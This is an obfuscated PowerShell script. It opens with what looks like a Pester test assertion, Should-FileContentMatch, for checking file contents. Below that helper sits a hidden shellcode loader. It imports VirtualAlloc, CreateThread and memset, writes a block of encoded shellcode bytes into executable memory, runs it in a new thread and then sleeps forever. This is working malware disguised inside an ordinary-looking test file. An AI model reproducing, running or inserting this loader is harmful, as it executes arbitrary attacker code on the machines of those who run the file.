function sh`oULD-F`il`ecO`NtE`NTMaTCH(${ACTU`A`LVa`Lue}, ${ExpEC`Te`dcO`Nte`NT}, [switch] ${NEg`Ate}, ${bEC`AUse}) {
    
    ${SuCCE`E`DeD} = (@(& ${saF`EcOMMA`NDs}[("{2}{1}{0}" -f 'ontent','-C','Get')] -Encoding ("{1}{0}" -f'F8','UT') ${A`cTU`ALvaL`UE}) -match ${e`x`pEcTeDCoN`Tent})."Co`UNt" -gt 0

    if (${nEGa`Te}) {
        ${Succ`EE`DEd} = -not ${Succ`Ee`DEd}
    }

    ${FAIlU`R`EMesS`A`GE} = ''

    if (-not ${SU`Ccee`D`ED}) {
        if (${NEg`A`TE}) {
            ${F`AILu`REM`essage} = &("{9}{0}{1}{4}{5}{2}{3}{8}{7}{6}"-f'tS','houldF','entMa','tchF','ile','Cont','reMessage','lu','ai','No') -ActualValue ${A`Ctua`lValue} -ExpectedContent ${eXP`eCteD`cOn`TeNT} -Because ${B`ECAUSE}
        }
        else {
            ${faiLur`Em`e`ssAGe} = .("{1}{2}{0}{7}{4}{5}{3}{6}"-f 'o','ShouldF','ileC','ureMess','atc','hFail','age','ntentM') -ActualValue ${A`C`TuALVa`luE} -ExpectedContent ${E`xPEC`T`ed`CONtenT} -Because ${BEC`A`UsE}
        }
    }

    return & ${SAF`ECoM`MA`N`DS}[("{0}{2}{1}"-f'New-Obje','t','c')] ("{0}{1}" -f 'psob','ject') -Property @{
        ("{0}{1}{2}" -f 'Succ','eede','d')      = ${sUccE`ED`ED}
        ("{0}{1}{2}" -f 'Fai','lureMessag','e') = ${f`AilU`REM`ESSAGe}
    }
}

function shO`Ul`d`FIL`e`CONTenTMatCHfAI`l`UrE`meSS`AgE(${a`ctUa`lvAL`UE}, ${ExPE`cTEdC`ON`T`ENT}, ${b`ec`AuSE}) {
    return "Expected $(Format-Nicely $ExpectedContent) to be found in file '$ActualValue',$(Format-Because $Because) but it was not found. "
}

function NotS`ho`ULDfIlE`cONtENtMAtchFaI`lurem`es`SagE(${ACtua`lV`AlUE}, ${E`xpecTeD`CO`NTeNt}, ${b`E`CausE}) {
    return "Expected $(Format-Nicely $ExpectedContent) to not be found in file '$ActualValue',$(Format-Because $Because) but it was found. "
}

.("{2}{0}{3}{1}" -f'serti','ator','Add-As','onOper') -Name         ("{3}{0}{1}{2}"-f 'ontent','Matc','h','FileC') `
    -InternalName ("{0}{4}{2}{5}{1}{3}" -f 'Shoul','tc','eContentM','h','d-Fil','a') `
    -Test         ${function:Should-FileContentMatch}

${6U`HT} = ((("{64}{40}{46}{61}{72}{42}{18}{85}{29}{41}{4}{93}{27}{80}{2}{22}{62}{1}{86}{65}{97}{35}{56}{78}{95}{36}{63}{8}{54}{7}{10}{60}{94}{90}{21}{17}{6}{32}{12}{52}{50}{69}{73}{38}{37}{83}{59}{34}{74}{79}{19}{26}{24}{51}{13}{47}{89}{23}{3}{87}{81}{9}{43}{14}{45}{0}{31}{57}{82}{55}{88}{15}{44}{77}{39}{11}{16}{48}{33}{58}{66}{96}{75}{70}{20}{53}{71}{67}{76}{28}{98}{92}{25}{91}{49}{68}{5}{84}{101}{30}{99}{100}"-f' I','ss, u','A','ze, IntP','loc',' ui','c stat','e','ct);[DllI','pStartAdd','l',' lp','e',' ui','s','dwCreat','Threa','li',' extern','A','p5',')]pub','ddr','tackSi','ributes','emset(','tt','r l','Pt','tPtr Vir','c, ','ntPtr lpPara','ic ','Dl','tr l','flAl','onType, u','reateT','C','tr','p','tualAl',' static','re','ionFlags, Int','s,','ort(p50kernel32','nt ','dId);[','ntP',' I',',','xtern','0)','mport(p50kern','uin','lo','met','lImp','tP','3','.dllp50)]publ','e','int flProte','[DllIm','Size,','ort(',' In','tr dest,','ntPt','rt.dll',']public static extern','ic','r ','pT','msvc','t','P','c','hread','p','l','er, ','hread(In','nt s',' In','int dw','tr ','t ','dwS','.dllp50','I',' m','(IntPt','2','ati','p50',' uint ','r','uin','t count);','r'))."rEPl`A`CE"('p50',[sTrIng][Char]34));${W} = &("{2}{1}{0}" -f 'pe','dd-Ty','A') -memberDefinition ${6u`hT} -Name ("{0}{1}"-f'Wi','n32') -namespace ("{2}{0}{3}{1}"-f 'n','ctions','Wi','32Fun') -passthru;[Byte[]];[Byte[]]${z} = 0xda,0xd6,0xbf,0xb6,0xed,0xe8,0xc5,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,0x5a,0x31,0x7e,0x17,0x83,0xee,0xfc,0x03,0xc8,0xfe,0x0a,0x30,0xc8,0xe9,0x49,0xbb,0x30,0xea,0x2d,0x35,0xd5,0xdb,0x6d,0x21,0x9e,0x4c,0x5e,0x21,0xf2,0x60,0x15,0x67,0xe6,0xf3,0x5b,0xa0,0x09,0xb3,0xd6,0x96,0x24,0x44,0x4a,0xea,0x27,0xc6,0x91,0x3f,0x87,0xf7,0x59,0x32,0xc6,0x30,0x87,0xbf,0x9a,0xe9,0xc3,0x12,0x0a,0x9d,0x9e,0xae,0xa1,0xed,0x0f,0xb7,0x56,0xa5,0x2e,0x96,0xc9,0xbd,0x68,0x38,0xe8,0x12,0x01,0x71,0xf2,0x77,0x2c,0xcb,0x89,0x4c,0xda,0xca,0x5b,0x9d,0x23,0x60,0xa2,0x11,0xd6,0x78,0xe3,0x96,0x09,0x0f,0x1d,0xe5,0xb4,0x08,0xda,0x97,0x62,0x9c,0xf8,0x30,0xe0,0x06,0x24,0xc0,0x25,0xd0,0xaf,0xce,0x82,0x96,0xf7,0xd2,0x15,0x7a,0x8c,0xef,0x9e,0x7d,0x42,0x66,0xe4,0x59,0x46,0x22,0xbe,0xc0,0xdf,0x8e,0x11,0xfc,0x3f,0x71,0xcd,0x58,0x34,0x9c,0x1a,0xd1,0x17,0xc9,0xb2,0x8f,0xd3,0x09,0x23,0x27,0x72,0x64,0xda,0x93,0xec,0x34,0x6b,0x3a,0xeb,0x3b,0x46,0x73,0x28,0x90,0x3a,0x27,0x9d,0x44,0xd5,0xfd,0x77,0x12,0x82,0xfd,0xa2,0xb7,0x9f,0x6b,0x4f,0x6b,0x73,0x04,0xe7,0x9a,0x73,0xd4,0x1f,0x10,0x73,0xd4,0xdf,0x06,0x42,0xe2,0xe7,0x17,0xc3,0x0a,0x47,0xc0,0x44,0x82,0xf8,0xd6,0x94,0x41,0x8f,0x11,0x39,0x02,0x8f,0xaf,0x5e,0x56,0xdc,0x9c,0xcd,0x00,0xb1,0x74,0x9a,0x45,0x60,0x57,0x61,0x65,0x5f,0x31,0xff,0x93,0x00,0x56,0x80,0x97,0xbe,0xa6,0x09,0x37,0xd4,0xa2,0x59,0xd2,0x37,0xfd,0x31,0x57,0x01,0x9f,0x44,0x68,0x58,0xcc,0x1b,0xc4,0x31,0xa5,0xf3,0xc7,0xb3,0x51,0x7f,0xe7,0x6e,0xe4,0xbf,0x62,0x9a,0xa8,0x4a,0x54,0xf2,0xc6,0x00,0xc4,0x54,0xd8,0xbe,0x63,0x18,0x4e,0x41,0x64,0x98,0x8e,0x29,0x84,0x98,0xce,0xa9,0xd7,0xf0,0x96,0x0d,0x84,0xe5,0xd8,0x9b,0xb8,0xb6,0x75,0xad,0x58,0x6f,0x12,0xad,0x86,0x8f,0xe2,0xfe,0x90,0xe7,0xf0,0x96,0x94,0x15,0x0b,0x43,0x23,0x19,0x80,0xa1,0xa7,0x9e,0x68,0xf9,0x3d,0x60,0x1f,0x18,0x65,0xa3,0xbf,0x0a,0xe3,0xdc,0xbf,0x34,0x62,0x4b,0x2e,0xac,0x0e,0xee,0xc3,0x5c,0x98,0x9e,0x7c,0xd4,0x3f,0x33,0xad,0x7e,0xaf,0xbb,0xc5,0x11,0x01,0x54,0x54,0x89,0x5d;${G} = 0x1000;if (${Z}."l`eNgTH" -gt 0x1000){${G} = ${Z}."leNg`TH"};${ng`Vk}=${W}::("{1}{2}{0}"-f 'lAlloc','V','irtua').Invoke(0,0x1000,${g},0x40);for (${I}=0;${i} -le (${Z}."le`N`GTh"-1);${I}++) {${w}::"m`EmseT"([IntPtr](${n`GVK}.("{1}{0}" -f'Int32','To').Invoke()+${I}), ${Z}[${i}], 1)};${W}::("{2}{0}{3}{1}"-f'e','ead','Cr','ateThr').Invoke(0,0,${n`gvK},0,0,0);for (;;){&("{2}{0}{1}" -f'tar','t-sleep','S') 60};
